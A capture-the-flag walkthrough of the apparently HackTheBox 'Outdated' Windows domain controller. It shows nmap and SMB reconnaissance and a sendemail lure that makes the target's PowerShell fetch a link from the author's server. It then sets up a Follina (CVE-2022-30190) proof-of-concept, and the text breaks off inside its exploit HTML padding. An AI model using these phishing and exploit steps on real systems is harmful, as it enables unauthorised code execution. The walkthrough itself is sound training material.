Initial Recon

Nmap

Starting with a full tcp port scan using nmap, I got the below results:

$ nmap -vvv -p- -A -oN nmap/tcp-all.txt -Pn 10.10.11.175
Nmap scan report for 10.10.11.175
Host is up, received user-set (0.077s latency).
Scanned at 2022-09-26 14:09:09 EEST for 731s
Not shown: 65513 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON  VERSION
25/tcp    open  smtp          syn-ack hMailServer smtpd
| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2022-09-26 18:19:42Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Issuer: commonName=outdated-DC-CA/domainComponent=outdated
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-18T05:50:24
| Not valid after:  2024-06-18T06:00:24
| MD5:   ddf3 d13d 3a6a 3fa0 1dee 8321 6784 83dc
| SHA-1: 7544 3aee ffbc 2ea7 bf61 1380 0a6c 16f1 cd07 afce
| -----BEGIN CERTIFICATE-----
| MIIFpDCCBIygAwIBAgITHQAAAAO0Hc53pH72GAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRgwFgYKCZImiZPyLGQBGRYIb3V0ZGF0
| ZWQxFzAVBgNVBAMTDm91dGRhdGVkLURDLUNBMB4XDTIyMDYxODA1NTAyNFoXDTI0
| MDYxODA2MDAyNFowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALE6
| oXztlMZYhET3e+DVQAJYB52HQHQnklGuIC5cIeoxbR4WiwfWXRhIpfNEo/1IXSs2
| xk4jOJpYOklg4PwfdHxhrS06+wSto7MgSksULWwjm0b7llqixKxo3o+PgVYOgQtN
| 7T6Mpxo153Q1gAVI0u6WpSYcSTBSMh//0anXX+2jPT5KNkoq7Ck3e4Nhjb44XFIT
| KG1xC+EbiwbcMxhW6+ufGIu3bINYQudykPSS8zClFmFWH9KnBvrpNDYdFye+6iz6
| AFMcjmzy1Ezwec/3pP1EutaZHf1pTCJ+ec7O3mISNQ19hPaI3pMcgGzpUEPvpWfj
| HzPymRPVfGof6KGSjq0CAwEAAaOCAs0wggLJMDsGCSsGAQQBgjcVBwQuMCwGJCsG
| AQQBgjcVCIT9zQLE9DP5hROD9rYjhd3sS0OD/9Y6hYyCKwIBZAIBAjAyBgNVHSUE
| KzApBgcrBgEFAgMFBgorBgEEAYI3FAICBggrBgEFBQcDAQYIKwYBBQUHAwIwDgYD
| VR0PAQH/BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCQYHKwYBBQIDBTAMBgorBgEE
| AYI3FAICMAoGCCsGAQUFBwMBMAoGCCsGAQUFBwMCMB0GA1UdDgQWBBSsuFEFtUSl
| l20qj0JnZQ99CDj4UDAfBgNVHSMEGDAWgBQqRfR/8VopV8PGTe6GJT0dbv5UtjCB
| yAYDVR0fBIHAMIG9MIG6oIG3oIG0hoGxbGRhcDovLy9DTj1vdXRkYXRlZC1EQy1D
| QSxDTj1EQyxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vy
| dmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1vdXRkYXRlZCxEQz1odGI/Y2VydGlm
| aWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1
| dGlvblBvaW50MIHBBggrBgEFBQcBAQSBtDCBsTCBrgYIKwYBBQUHMAKGgaFsZGFw
| Oi8vL0NOPW91dGRhdGVkLURDLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBT
| ZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW91dGRhdGVk
| LERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNh
| dGlvbkF1dGhvcml0eTA1BgNVHREBAf8EKzApgg9EQy5vdXRkYXRlZC5odGKCDG91
| dGRhdGVkLmh0YoIIT1VUREFURUQwDQYJKoZIhvcNAQELBQADggEBAA4fLq61cFEC
| gv9/iMwPO02NC0SbPNHquvsIdEwkqEvx+hr6hfvmv3UTyQXgZQSIZDoaZWxR/47l
| JDQjF45v9O0rYKvYKLh/tOpCaxY2cF1RcRJiO2Vbg/RtKB/dd022srF+u2nBuvO0
| VgxHlsiP+tHvY8zX9JBVMMQLjx8Uf9yPkxO7rNwNHyeh5PKtcUrqNRQc8n0Pqg6K
| Mc320ONyncAW7RPAdVd3zhLsHEzBtGtZgmc8QXKNsxdxbdmDbiCRQFsCKLku3m7M
| vtnc2e0fgjcVmBmJqQVOdptMb7L80UtN8mYkjMkvdeCO2QrAoAir1J8osZo7TWpL
| E2BaNXsDGeo=
|_-----END CERTIFICATE-----
|_ssl-date: 2022-09-26T18:21:14+00:00; +6h59m57s from scanner time.
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Issuer: commonName=outdated-DC-CA/domainComponent=outdated
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-18T05:50:24
| Not valid after:  2024-06-18T06:00:24
| MD5:   ddf3 d13d 3a6a 3fa0 1dee 8321 6784 83dc
| SHA-1: 7544 3aee ffbc 2ea7 bf61 1380 0a6c 16f1 cd07 afce
| -----BEGIN CERTIFICATE-----
| MIIFpDCCBIygAwIBAgITHQAAAAO0Hc53pH72GAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRgwFgYKCZImiZPyLGQBGRYIb3V0ZGF0
| ZWQxFzAVBgNVBAMTDm91dGRhdGVkLURDLUNBMB4XDTIyMDYxODA1NTAyNFoXDTI0
| MDYxODA2MDAyNFowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALE6
| oXztlMZYhET3e+DVQAJYB52HQHQnklGuIC5cIeoxbR4WiwfWXRhIpfNEo/1IXSs2
| xk4jOJpYOklg4PwfdHxhrS06+wSto7MgSksULWwjm0b7llqixKxo3o+PgVYOgQtN
| 7T6Mpxo153Q1gAVI0u6WpSYcSTBSMh//0anXX+2jPT5KNkoq7Ck3e4Nhjb44XFIT
| KG1xC+EbiwbcMxhW6+ufGIu3bINYQudykPSS8zClFmFWH9KnBvrpNDYdFye+6iz6
| AFMcjmzy1Ezwec/3pP1EutaZHf1pTCJ+ec7O3mISNQ19hPaI3pMcgGzpUEPvpWfj
| HzPymRPVfGof6KGSjq0CAwEAAaOCAs0wggLJMDsGCSsGAQQBgjcVBwQuMCwGJCsG
| AQQBgjcVCIT9zQLE9DP5hROD9rYjhd3sS0OD/9Y6hYyCKwIBZAIBAjAyBgNVHSUE
| KzApBgcrBgEFAgMFBgorBgEEAYI3FAICBggrBgEFBQcDAQYIKwYBBQUHAwIwDgYD
| VR0PAQH/BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCQYHKwYBBQIDBTAMBgorBgEE
| AYI3FAICMAoGCCsGAQUFBwMBMAoGCCsGAQUFBwMCMB0GA1UdDgQWBBSsuFEFtUSl
| l20qj0JnZQ99CDj4UDAfBgNVHSMEGDAWgBQqRfR/8VopV8PGTe6GJT0dbv5UtjCB
| yAYDVR0fBIHAMIG9MIG6oIG3oIG0hoGxbGRhcDovLy9DTj1vdXRkYXRlZC1EQy1D
| QSxDTj1EQyxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vy
| dmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1vdXRkYXRlZCxEQz1odGI/Y2VydGlm
| aWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1
| dGlvblBvaW50MIHBBggrBgEFBQcBAQSBtDCBsTCBrgYIKwYBBQUHMAKGgaFsZGFw
| Oi8vL0NOPW91dGRhdGVkLURDLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBT
| ZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW91dGRhdGVk
| LERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNh
| dGlvbkF1dGhvcml0eTA1BgNVHREBAf8EKzApgg9EQy5vdXRkYXRlZC5odGKCDG91
| dGRhdGVkLmh0YoIIT1VUREFURUQwDQYJKoZIhvcNAQELBQADggEBAA4fLq61cFEC
| gv9/iMwPO02NC0SbPNHquvsIdEwkqEvx+hr6hfvmv3UTyQXgZQSIZDoaZWxR/47l
| JDQjF45v9O0rYKvYKLh/tOpCaxY2cF1RcRJiO2Vbg/RtKB/dd022srF+u2nBuvO0
| VgxHlsiP+tHvY8zX9JBVMMQLjx8Uf9yPkxO7rNwNHyeh5PKtcUrqNRQc8n0Pqg6K
| Mc320ONyncAW7RPAdVd3zhLsHEzBtGtZgmc8QXKNsxdxbdmDbiCRQFsCKLku3m7M
| vtnc2e0fgjcVmBmJqQVOdptMb7L80UtN8mYkjMkvdeCO2QrAoAir1J8osZo7TWpL
| E2BaNXsDGeo=
|_-----END CERTIFICATE-----
|_ssl-date: 2022-09-26T18:21:15+00:00; +6h59m57s from scanner time.
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Issuer: commonName=outdated-DC-CA/domainComponent=outdated
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-18T05:50:24
| Not valid after:  2024-06-18T06:00:24
| MD5:   ddf3 d13d 3a6a 3fa0 1dee 8321 6784 83dc
| SHA-1: 7544 3aee ffbc 2ea7 bf61 1380 0a6c 16f1 cd07 afce
| -----BEGIN CERTIFICATE-----
| MIIFpDCCBIygAwIBAgITHQAAAAO0Hc53pH72GAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRgwFgYKCZImiZPyLGQBGRYIb3V0ZGF0
| ZWQxFzAVBgNVBAMTDm91dGRhdGVkLURDLUNBMB4XDTIyMDYxODA1NTAyNFoXDTI0
| MDYxODA2MDAyNFowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALE6
| oXztlMZYhET3e+DVQAJYB52HQHQnklGuIC5cIeoxbR4WiwfWXRhIpfNEo/1IXSs2
| xk4jOJpYOklg4PwfdHxhrS06+wSto7MgSksULWwjm0b7llqixKxo3o+PgVYOgQtN
| 7T6Mpxo153Q1gAVI0u6WpSYcSTBSMh//0anXX+2jPT5KNkoq7Ck3e4Nhjb44XFIT
| KG1xC+EbiwbcMxhW6+ufGIu3bINYQudykPSS8zClFmFWH9KnBvrpNDYdFye+6iz6
| AFMcjmzy1Ezwec/3pP1EutaZHf1pTCJ+ec7O3mISNQ19hPaI3pMcgGzpUEPvpWfj
| HzPymRPVfGof6KGSjq0CAwEAAaOCAs0wggLJMDsGCSsGAQQBgjcVBwQuMCwGJCsG
| AQQBgjcVCIT9zQLE9DP5hROD9rYjhd3sS0OD/9Y6hYyCKwIBZAIBAjAyBgNVHSUE
| KzApBgcrBgEFAgMFBgorBgEEAYI3FAICBggrBgEFBQcDAQYIKwYBBQUHAwIwDgYD
| VR0PAQH/BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCQYHKwYBBQIDBTAMBgorBgEE
| AYI3FAICMAoGCCsGAQUFBwMBMAoGCCsGAQUFBwMCMB0GA1UdDgQWBBSsuFEFtUSl
| l20qj0JnZQ99CDj4UDAfBgNVHSMEGDAWgBQqRfR/8VopV8PGTe6GJT0dbv5UtjCB
| yAYDVR0fBIHAMIG9MIG6oIG3oIG0hoGxbGRhcDovLy9DTj1vdXRkYXRlZC1EQy1D
| QSxDTj1EQyxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vy
| dmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1vdXRkYXRlZCxEQz1odGI/Y2VydGlm
| aWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1
| dGlvblBvaW50MIHBBggrBgEFBQcBAQSBtDCBsTCBrgYIKwYBBQUHMAKGgaFsZGFw
| Oi8vL0NOPW91dGRhdGVkLURDLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBT
| ZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW91dGRhdGVk
| LERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNh
| dGlvbkF1dGhvcml0eTA1BgNVHREBAf8EKzApgg9EQy5vdXRkYXRlZC5odGKCDG91
| dGRhdGVkLmh0YoIIT1VUREFURUQwDQYJKoZIhvcNAQELBQADggEBAA4fLq61cFEC
| gv9/iMwPO02NC0SbPNHquvsIdEwkqEvx+hr6hfvmv3UTyQXgZQSIZDoaZWxR/47l
| JDQjF45v9O0rYKvYKLh/tOpCaxY2cF1RcRJiO2Vbg/RtKB/dd022srF+u2nBuvO0
| VgxHlsiP+tHvY8zX9JBVMMQLjx8Uf9yPkxO7rNwNHyeh5PKtcUrqNRQc8n0Pqg6K
| Mc320ONyncAW7RPAdVd3zhLsHEzBtGtZgmc8QXKNsxdxbdmDbiCRQFsCKLku3m7M
| vtnc2e0fgjcVmBmJqQVOdptMb7L80UtN8mYkjMkvdeCO2QrAoAir1J8osZo7TWpL
| E2BaNXsDGeo=
|_-----END CERTIFICATE-----
|_ssl-date: 2022-09-26T18:21:14+00:00; +6h59m57s from scanner time.
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-09-26T18:21:15+00:00; +6h59m57s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Issuer: commonName=outdated-DC-CA/domainComponent=outdated
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-18T05:50:24
| Not valid after:  2024-06-18T06:00:24
| MD5:   ddf3 d13d 3a6a 3fa0 1dee 8321 6784 83dc
| SHA-1: 7544 3aee ffbc 2ea7 bf61 1380 0a6c 16f1 cd07 afce
| -----BEGIN CERTIFICATE-----
| MIIFpDCCBIygAwIBAgITHQAAAAO0Hc53pH72GAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRgwFgYKCZImiZPyLGQBGRYIb3V0ZGF0
| ZWQxFzAVBgNVBAMTDm91dGRhdGVkLURDLUNBMB4XDTIyMDYxODA1NTAyNFoXDTI0
| MDYxODA2MDAyNFowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALE6
| oXztlMZYhET3e+DVQAJYB52HQHQnklGuIC5cIeoxbR4WiwfWXRhIpfNEo/1IXSs2
| xk4jOJpYOklg4PwfdHxhrS06+wSto7MgSksULWwjm0b7llqixKxo3o+PgVYOgQtN
| 7T6Mpxo153Q1gAVI0u6WpSYcSTBSMh//0anXX+2jPT5KNkoq7Ck3e4Nhjb44XFIT
| KG1xC+EbiwbcMxhW6+ufGIu3bINYQudykPSS8zClFmFWH9KnBvrpNDYdFye+6iz6
| AFMcjmzy1Ezwec/3pP1EutaZHf1pTCJ+ec7O3mISNQ19hPaI3pMcgGzpUEPvpWfj
| HzPymRPVfGof6KGSjq0CAwEAAaOCAs0wggLJMDsGCSsGAQQBgjcVBwQuMCwGJCsG
| AQQBgjcVCIT9zQLE9DP5hROD9rYjhd3sS0OD/9Y6hYyCKwIBZAIBAjAyBgNVHSUE
| KzApBgcrBgEFAgMFBgorBgEEAYI3FAICBggrBgEFBQcDAQYIKwYBBQUHAwIwDgYD
| VR0PAQH/BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCQYHKwYBBQIDBTAMBgorBgEE
| AYI3FAICMAoGCCsGAQUFBwMBMAoGCCsGAQUFBwMCMB0GA1UdDgQWBBSsuFEFtUSl
| l20qj0JnZQ99CDj4UDAfBgNVHSMEGDAWgBQqRfR/8VopV8PGTe6GJT0dbv5UtjCB
| yAYDVR0fBIHAMIG9MIG6oIG3oIG0hoGxbGRhcDovLy9DTj1vdXRkYXRlZC1EQy1D
| QSxDTj1EQyxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vy
| dmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1vdXRkYXRlZCxEQz1odGI/Y2VydGlm
| aWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1
| dGlvblBvaW50MIHBBggrBgEFBQcBAQSBtDCBsTCBrgYIKwYBBQUHMAKGgaFsZGFw
| Oi8vL0NOPW91dGRhdGVkLURDLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBT
| ZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW91dGRhdGVk
| LERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNh
| dGlvbkF1dGhvcml0eTA1BgNVHREBAf8EKzApgg9EQy5vdXRkYXRlZC5odGKCDG91
| dGRhdGVkLmh0YoIIT1VUREFURUQwDQYJKoZIhvcNAQELBQADggEBAA4fLq61cFEC
| gv9/iMwPO02NC0SbPNHquvsIdEwkqEvx+hr6hfvmv3UTyQXgZQSIZDoaZWxR/47l
| JDQjF45v9O0rYKvYKLh/tOpCaxY2cF1RcRJiO2Vbg/RtKB/dd022srF+u2nBuvO0
| VgxHlsiP+tHvY8zX9JBVMMQLjx8Uf9yPkxO7rNwNHyeh5PKtcUrqNRQc8n0Pqg6K
| Mc320ONyncAW7RPAdVd3zhLsHEzBtGtZgmc8QXKNsxdxbdmDbiCRQFsCKLku3m7M
| vtnc2e0fgjcVmBmJqQVOdptMb7L80UtN8mYkjMkvdeCO2QrAoAir1J8osZo7TWpL
| E2BaNXsDGeo=
|_-----END CERTIFICATE-----
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8530/tcp  open  http          syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title.
8531/tcp  open  unknown       syn-ack
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49687/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49688/tcp open  msrpc         syn-ack Microsoft Windows RPC
49930/tcp open  msrpc         syn-ack Microsoft Windows RPC
60156/tcp open  msrpc         syn-ack Microsoft Windows RPC
63257/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Hosts: mail.outdated.htb, DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-09-26T18:20:36
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 38272/tcp): CLEAN (Timeout)
|   Check 2 (port 42327/tcp): CLEAN (Timeout)
|   Check 3 (port 4812/udp): CLEAN (Timeout)
|   Check 4 (port 48887/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 6h59m56s, deviation: 0s, median: 6h59m56s

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 26 14:21:20 2022 -- 1 IP address (1 host up) scanned in 731.38 seconds

The default windows ports are open including 53 (DNS), 88 (Kerberos), 135 (MSRPC), 139 (NetBios), 445 (SMB) and 389 (LDAP) disclosing domain information: outdated.htb and DC.outdated.htb . There is also port 25 open, running a mail service and disclosing the mail domain: mail.outdated.htb.

I’ll add these domains to my /etc/hosts file:

echo -e '10.10.11.175\toutdated.htb , dc.outdated.htb , mail.outdated.htb' | sudo tee -a /etc/hosts

$ cat /etc/hosts | grep outdated
10.10.11.175	outdated.htb , dc.outdated.htb , mail.outdated.htb

Accessing Shares

First I’ll try to list available shares using:

smbclient -L 10.10.11.175 --no-pass

Listing Shares

I can see some interesting shares, so I’ll take a look at some of them:

smbclient  \\\\10.10.11.175/shares

Accessing Shares Share

Reading Important PDF

After accessing Shares share, I saw a NOC_Reminder.pdf file, and this is what it contains:

NOC_Reminder

It appears that they had a breach, and they made a security assessment for their network and found the following CVEs. They also listed a mail itsupport@outdated.htb for support staff that will get emails containing links for internal applications to get them added to the assessment process.

Since port 25 (Mail Server) is open, I’ll try to send a link to itsupport@outdated.htb after listening with netcat on port 80 on my machine and see if I get a hit back:

sendemail -f most@xeon.com -t itsupport@outdated.htb -u "Click on link" -m "http://10.10.16.7/" -s 10.10.11.175:25 -vvv

Getting Hit Back Testing

Identifying What Exploit Could Work

It worked. And it looks like what’s used to access the url is windows powershell which discloses the version WindowsPowerShell/5.1.19041.906, where the last part 19041.906 is the build number of windows operating system.

Googling this version shows that it was released on March 29 2021:

Getting Release Date Windows

Windows Support Release Date OS Version

After learning more about the CVEs listed in the pdf, how they work and what date they were published (to see if the current build is vulnerable), some of them appeared to be exploitable by sending a link to the victim and having him clicking on it. And the one that stood out to me is CVE-2022-30190 (Follina), which only requires an application used by the victim (such as the current case) to access a malicious html file and remote code execution will be triggered.

Reading CVE-2022-30190 Description

Exploiting CVE-2022-30190

There are many POCs available online, the one I’ll use is CVE-2022-30190 POC:

git clone https://github.com/onecloudemoji/CVE-2022-30190.git

Cloning Repo

The repo includes a .docx file that should be send to the victim and he must click it to triger the exploit, and this is because Microsoft Word uses a calling application that was vulnerable, however in my case, I don’t need any .docx file, since the victim is already using an application (powershell) to access my server, so all I need to do is to modify the exploit payload to run my malicious command and get a reverse shell.

exploit.html looks like this:

<!doctype html>
<html lang="en">
<head>
<title>
Exploit
</title>
</head>
<body>

<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
